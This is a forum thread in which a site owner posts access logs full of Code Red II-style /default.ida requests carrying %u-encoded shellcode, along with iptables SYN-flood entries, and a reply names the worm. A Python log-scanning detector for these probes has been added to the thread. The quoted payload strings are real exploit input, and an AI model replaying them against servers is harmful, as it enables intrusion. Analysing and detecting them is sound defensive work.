[What is this] Strange attacks ...

Marsh Posté on 15-03-2003 at 13:28:36

I looked at my logs, and I have this:
 
 

81.56.145.71 - - [15/Mar/2003:12:21:44 +0100] "GET /default.ida?XXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXX%u9090%u6858%ucbd3%u7801%u9090%u6858%ucbd3%u7801%u9090%u6858%ucbd3%u7801%u9090%u9090%u8190%u00c3%u0003%u8b00%u531b%u53ff%u0078%u0000%u00=a  HTTP/1.0" 410 295 "-" "-"
81.56.126.18 - - [15/Mar/2003:12:31:42 +0100] "GET /default.ida?XXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXX%u9090%u6858%ucbd3%u7801%u9090%u6858%ucbd3%u7801%u9090%u6858%ucbd3%u7801%u9090%u9090%u8190%u00c3%u0003%u8b00%u531b%u53ff%u0078%u0000%u00=a  HTTP/1.0" 410 295 "-" "-"
81.56.249.181 - - [15/Mar/2003:12:36:21 +0100] "GET /default.ida?XXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXX%u9090%u6858%ucbd3%u7801%u9090%u6858%ucbd3%u7801%u9090%u6858%ucbd3%u7801%u9090%u9090%u8190%u00c3%u0003%u8b00%u531b%u53ff%u0078%u0000%u00=a  HTTP/1.0" 410 295 "-" "-"
81.57.173.43 - - [15/Mar/2003:12:36:44 +0100] "GET /default.ida?XXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXX%u9090%u6858%ucbd3%u7801%u9090%u6858%ucbd3%u7801%u9090%u6858%ucbd3%u7801%u9090%u9090%u8190%u00c3%u0003%u8b00%u531b%u53ff%u0078%u0000%u00=a  HTTP/1.0" 410 295 "-" "-"
81.56.126.18 - - [15/Mar/2003:12:53:58 +0100] "GET /default.ida?XXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXX%u9090%u6858%ucbd3%u7801%u9090%u6858%ucbd3%u7801%u9090%u6858%ucbd3%u7801%u9090%u9090%u8190%u00c3%u0003%u8b00%u531b%u53ff%u0078%u0000%u00=a  HTTP/1.0" 410 295 "-" "-"
81.56.110.172 - - [15/Mar/2003:12:55:25 +0100] "GET /default.ida?XXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXX%u9090%u6858%ucbd3%u7801%u9090%u6858%ucbd3%u7801%u9090%u6858%ucbd3%u7801%u9090%u9090%u8190%u00c3%u0003%u8b00%u531b%u53ff%u0078%u0000%u00=a  HTTP/1.0" 410 295 "-" "-"
81.56.135.194 - - [15/Mar/2003:12:57:56 +0100] "GET /default.ida?XXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXX%u9090%u6858%ucbd3%u7801%u9090%u6858%ucbd3%u7801%u9090%u6858%ucbd3%u7801%u9090%u9090%u8190%u00c3%u0003%u8b00%u531b%u53ff%u0078%u0000%u00=a  HTTP/1.0" 410 295 "-" "-"
81.56.124.11 - - [15/Mar/2003:12:58:25 +0100] "GET /default.ida?XXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXX%u9090%u6858%ucbd3%u7801%u9090%u6858%ucbd3%u7801%u9090%u6858%ucbd3%u7801%u9090%u9090%u8190%u00c3%u0003%u8b00%u531b%u53ff%u0078%u0000%u00=a  HTTP/1.0" 410 295 "-" "-"
81.56.10.242 - - [15/Mar/2003:13:06:43 +0100] "GET /default.ida?XXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXX%u9090%u6858%ucbd3%u7801%u9090%u6858%ucbd3%u7801%u9090%u6858%ucbd3%u7801%u9090%u9090%u8190%u00c3%u0003%u8b00%u531b%u53ff%u0078%u0000%u00=a  HTTP/1.0" 410 295 "-" "-"
81.56.191.62 - - [15/Mar/2003:13:08:52 +0100] "GET /default.ida?XXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXX%u9090%u6858%ucbd3%u7801%u9090%u6858%ucbd3%u7801%u9090%u6858%ucbd3%u7801%u9090%u9090%u8190%u00c3%u0003%u8b00%u531b%u53ff%u0078%u0000%u00=a  HTTP/1.0" 410 295 "-" "-"
81.57.173.43 - - [15/Mar/2003:13:15:06 +0100] "GET /default.ida?XXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXX%u9090%u6858%ucbd3%u7801%u9090%u6858%ucbd3%u7801%u9090%u6858%ucbd3%u7801%u9090%u9090%u8190%u00c3%u0003%u8b00%u531b%u53ff%u0078%u0000%u00=a  HTTP/1.0" 410 295 "-" "-"
81.56.126.18 - - [15/Mar/2003:13:16:03 +0100] "GET /default.ida?XXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXX%u9090%u6858%ucbd3%u7801%u9090%u6858%ucbd3%u7801%u9090%u6858%ucbd3%u7801%u9090%u9090%u8190%u00c3%u0003%u8b00%u531b%u53ff%u0078%u0000%u00=a  HTTP/1.0" 410 295 "-" "-"

 
What is this crazy thing that comes from lots of different IPs and always with the same attack??
Does anyone have info on this?
 
And as a bonus I also have this:
 
 

REC=0x00 TTL=120 ID=56657 DF PROTO=TCP SPT=2066 DPT=80 WINDOW=8192 RES=0x00 SYN URGP=0  
Mar 15 10:54:36 routeur kernel: [IPTABLES syn flood] IN=ppp0 OUT= MAC= SRC=194.254.26.157 DST=81.56.219.82 LEN=44 TOS=0x00 PREC=0x00 TTL=120 ID=10082 DF PROTO=TCP SPT=2291 DPT=80 WINDOW=8192 RES=0x00 SYN URGP=0  
Mar 15 10:55:04 routeur kernel: [IPTABLES syn flood] IN=ppp0 OUT= MAC= SRC=194.254.26.157 DST=81.56.219.82 LEN=44 TOS=0x00 PREC=0x00 TTL=120 ID=31589 DF PROTO=TCP SPT=2334 DPT=80 WINDOW=8192 RES=0x00 SYN URGP=0  
Mar 15 10:56:03 routeur kernel: [IPTABLES syn flood] IN=ppp0 OUT= MAC= SRC=194.254.26.157 DST=81.56.219.82 LEN=44 TOS=0x00 PREC=0x00 TTL=120 ID=10862 DF PROTO=TCP SPT=2439 DPT=80 WINDOW=8192 RES=0x00 SYN URGP=0  
Mar 15 10:58:45 routeur kernel: [IPTABLES syn flood] IN=ppp0 OUT= MAC= SRC=194.254.26.157 DST=81.56.219.82 LEN=44 TOS=0x00 PREC=0x00 TTL=120 ID=53633 DF PROTO=TCP SPT=2658 DPT=80 WINDOW=8192 RES=0x00 SYN URGP=0  
Mar 15 10:58:45 routeur kernel: [IPTABLES syn flood] IN=ppp0 OUT= MAC= SRC=194.254.26.157 DST=81.56.219.82 LEN=44 TOS=0x00 PREC=0x00 TTL=120 ID=53889 DF PROTO=TCP SPT=2659 DPT=80 WINDOW=8192 RES=0x00 SYN URGP=0  
Mar 15 10:59:06 routeur kernel: [IPTABLES syn flood] IN=ppp0 OUT= MAC= SRC=194.254.26.157 DST=81.56.219.82 LEN=44 TOS=0x00 PREC=0x00 TTL=120 ID=32386 DF PROTO=TCP SPT=2662 DPT=80 WINDOW=8192 RES=0x00 SYN URGP=0  
Mar 15 11:01:11 routeur kernel: [IPTABLES syn flood] IN=ppp0 OUT= MAC= SRC=194.254.26.157 DST=81.56.219.82 LEN=44 TOS=0x00 PREC=0x00 TTL=120 ID=2705 DF PROTO=TCP SPT=2832 DPT=80 WINDOW=8192 RES=0x00 SYN URGP=0  
Mar 15 11:01:14 routeur kernel: [IPTABLES syn flood] IN=ppp0 OUT= MAC= SRC=194.254.26.157 DST=81.56.219.82 LEN=44 TOS=0x00 PREC=0x00 TTL=120 ID=58769 DF PROTO=TCP SPT=2832 DPT=80 WINDOW=8192 RES=0x00 SYN URGP=0  
Mar 15 11:03:29 routeur kernel: [IPTABLES syn flood] IN=ppp0 OUT= MAC= SRC=194.254.26.157 DST=81.56.219.82 LEN=44 TOS=0x00 PREC=0x00 TTL=120 ID=30110 DF PROTO=TCP SPT=3009 DPT=80 WINDOW=8192 RES=0x00 SYN URGP=0  
Mar 15 11:03:30 routeur kernel: [IPTABLES syn flood] IN=ppp0 OUT= MAC= SRC=194.254.26.157 DST=81.56.219.82 LEN=44 TOS=0x00 PREC=0x00 TTL=120 ID=34718 DF PROTO=TCP SPT=3010 DPT=80 WINDOW=8192 RES=0x00 SYN URGP=0  
Mar 15 11:05:42 routeur kernel: [IPTABLES syn flood] IN=ppp0 OUT= MAC= SRC=194.254.26.157 DST=81.56.219.82 LEN=44 TOS=0x00 PREC=0x00 TTL=120 ID=29610 DF PROTO=TCP SPT=3183 DPT=80 WINDOW=8192 RES=0x00 SYN URGP=0  
Mar 15 11:05:42 routeur kernel: [IPTABLES syn flood] IN=ppp0 OUT= MAC= SRC=194.254.26.157 DST=81.56.219.82 LEN=44 TOS=0x00 PREC=0x00 TTL=120 ID=29866 DF PROTO=TCP SPT=3184 DPT=80 WINDOW=8192 RES=0x00 SYN URGP=0  
Mar 15 11:07:46 routeur kernel: [IPTABLES syn flood] IN=ppp0 OUT= MAC= SRC=194.254.26.157 DST=81.56.219.82 LEN=44 TOS=0x00 PREC=0x00 TTL=120 ID=42951 DF PROTO=TCP SPT=3363 DPT=80 WINDOW=8192 RES=0x00 SYN URGP=0  
Mar 15 11:07:46 routeur kernel: [IPTABLES syn flood] IN=ppp0 OUT= MAC= SRC=194.254.26.157 DST=81.56.219.82 LEN=44 TOS=0x00 PREC=0x00 TTL=120 ID=43207 DF PROTO=TCP SPT=3364 DPT=80 WINDOW=8192 RES=0x00 SYN URGP=0  
Mar 15 11:34:17 routeur kernel: [IPTABLES SYN packet] IN=ppp0 OUT= MAC= SRC=81.56.247.46 DST=81.56.219.82 LEN=48 TOS=0x00 PREC=0x00 TTL=126 ID=17868 DF PROTO=TCP SPT=4893 DPT=80 WINDOW=65535 RES=0x00 SYN URGP=0  
Mar 15 11:36:15 routeur kernel: [IPTABLES SYN packet] IN=ppp0 OUT= MAC= SRC=81.56.10.242 DST=81.56.219.82 LEN=48 TOS=0x00 PREC=0x00 TTL=126 ID=35187 DF PROTO=TCP SPT=2751 DPT=80 WINDOW=65535 RES=0x00 SYN URGP=0  
Mar 15 12:21:29 routeur kernel: [IPTABLES SYN packet] IN=ppp0 OUT= MAC= SRC=81.56.145.71 DST=81.56.219.82 LEN=48 TOS=0x00 PREC=0x00 TTL=126 ID=61259 DF PROTO=TCP SPT=3175 DPT=80 WINDOW=65535 RES=0x00 SYN URGP=0  
Mar 15 12:53:53 routeur kernel: [IPTABLES SYN packet] IN=ppp0 OUT= MAC= SRC=81.56.126.18 DST=81.56.219.82 LEN=48 TOS=0x00 PREC=0x00 TTL=126 ID=23003 DF PROTO=TCP SPT=4644 DPT=80 WINDOW=65535 RES=0x00 SYN URGP=0  
Mar 15 12:55:13 routeur kernel: [IPTABLES SYN packet] IN=ppp0 OUT= MAC= SRC=81.56.110.172 DST=81.56.219.82 LEN=48 TOS=0x00 PREC=0x00 TTL=126 ID=36831 DF PROTO=TCP SPT=4337 DPT=80 WINDOW=65535 RES=0x00 SYN URGP=0  
Mar 15 13:06:29 routeur kernel: [IPTABLES SYN packet] IN=ppp0 OUT= MAC= SRC=81.56.10.242 DST=81.56.219.82 LEN=48 TOS=0x00 PREC=0x00 TTL=126 ID=49647 DF PROTO=TCP SPT=1521 DPT=80 WINDOW=65535 RES=0x00 SYN URGP=0  
Mar 15 13:06:35 routeur kernel: [IPTABLES SYN packet] IN=ppp0 OUT= MAC= SRC=81.56.10.242 DST=81.56.219.82 LEN=48 TOS=0x00 PREC=0x00 TTL=126 ID=50246 DF PROTO=TCP SPT=1521 DPT=80 WINDOW=65535 RES=0x00 SYN URGP=0  
Mar 15 13:15:12 routeur kernel: [IPTABLES ACK packet] IN=ppp0 OUT= MAC= SRC=81.57.197.116 DST=81.56.219.82 LEN=40 TOS=0x00 PREC=0x00 TTL=127 ID=4405 PROTO=TCP SPT=4662 DPT=35835 WINDOW=0 RES=0x00 ACK RST URGP=0  
Mar 15 13:18:22 routeur kernel: [IPTABLES Paquet invalide] IN=ppp0 OUT= MAC= SRC=80.132.249.5 DST=81.56.219.82 LEN=56 TOS=0x00 PREC=0x00 TTL=119 ID=13043 PROTO=ICMP TYPE=3 CODE=3 [SRC=81.56.219.82 DST=192.168.1.134 LEN=46 TOS=0x00 PREC=0x00 TTL=52 ID=0 DF PROTO=UDP SPT=31040 DPT=4665 LEN=26 ]  
Mar 15 13:18:55 routeur kernel: [IPTABLES SYN packet] IN=ppp0 OUT= MAC= SRC=81.56.247.46 DST=81.56.219.82 LEN=48 TOS=0x00 PREC=0x00 TTL=126 ID=16500 DF PROTO=TCP SPT=4574 DPT=80 WINDOW=65535 RES=0x00 SYN URGP=0  

 
 
Do I attract the relentless ones??


Message edited by HuGoBioS on 15-03-2003 at 13:29:19

---------------
-= In Kik00 101 I trust :o =-
Reply

Marsh Posté on 15-03-2003 at 13:29:41

A variant of Code Red II:
http://forum.hardware.fr/forum2.ph [...] h=&subcat=


---------------
He who asks a question is a fool for 5 minutes. He who does not ask remains one all his life. |  Member of the great pharmaceutical-medical-scientific-Judeo-Masonic conspiracy.
Reply
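
Added example, not part of the original thread: one way to pull the `/default.ida` requests shown in the first post out of an Apache access log and group them by source, with the status code the server returned. The function names, the 100-character filler threshold and the sample lines (documentation-range addresses, placeholder `%u` words) are assumptions made for this sketch.

```python
import re

# Apache access-log line: client IP, timestamp, request line, status code.
LINE_RE = re.compile(
    r'^(?P<ip>\S+) \S+ \S+ \[(?P<ts>[^\]]+)\] "(?P<req>[^"]*)" (?P<status>\d{3}) ')
# Shape of the requests in the thread: /default.ida, a long run of a single
# filler character (100+ is an assumed threshold), then %uXXXX-encoded words.
PROBE_RE = re.compile(
    r'^GET /default\.ida\?(?P<ch>[A-Za-z])(?P=ch){99,}(?:%u[0-9a-fA-F]{4})+')


def find_ida_probes(lines):
    """Group matching requests by source IP: hit count, first/last seen,
    filler character(s) and the status codes the server answered with."""
    hits = {}
    for line in lines:
        m = LINE_RE.match(line)
        p = PROBE_RE.match(m.group("req")) if m else None
        if not p:
            continue
        rec = hits.setdefault(m.group("ip"), {
            "hits": 0, "first": m.group("ts"), "pad": set(), "statuses": set()})
        rec["hits"] += 1
        rec["last"] = m.group("ts")
        rec["pad"].add(p.group("ch"))
        rec["statuses"].add(int(m.group("status")))
    return hits


def answered_2xx(hits):
    """Sources whose probe got a 2xx instead of an error: worth a closer look."""
    return sorted(ip for ip, r in hits.items()
                  if any(200 <= s < 300 for s in r["statuses"]))


def make_line(ip, ts, pad="X", status=410):
    # Constructed sample line; the %u words are placeholders, not a real payload.
    req = "GET /default.ida?" + pad * 224 + "%u4141%u4242=a HTTP/1.0"
    return f'{ip} - - [{ts}] "{req}" {status} 295 "-" "-"'


SAMPLE_LOG = [  # constructed, documentation-range addresses
    make_line("192.0.2.10", "15/Mar/2003:12:21:44 +0100"),
    make_line("192.0.2.10", "15/Mar/2003:12:53:58 +0100"),
    make_line("198.51.100.7", "15/Mar/2003:12:36:21 +0100", pad="N", status=200),
    '203.0.113.5 - - [15/Mar/2003:12:40:00 +0100] "GET /index.html HTTP/1.0" 200 1024 "-" "-"',
    '203.0.113.5 - - [15/Mar/2003:12:41:00 +0100] "GET /default.ida?XXXX HTTP/1.0" 404 0 "-" "-"',
]

if __name__ == "__main__":
    for ip, rec in find_ida_probes(SAMPLE_LOG).items():
        print(ip, rec["hits"], rec["first"], rec["last"], sorted(rec["statuses"]))
```

The per-source first/last timestamps can then be lined up against the firewall log entries for the same addresses.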

Marsh Posté on 15-03-2003 at 13:34:28

ok ... that's annoying :/
 
Thanks for the info!


---------------
-= In Kik00 101 I trust :o =-
Reply
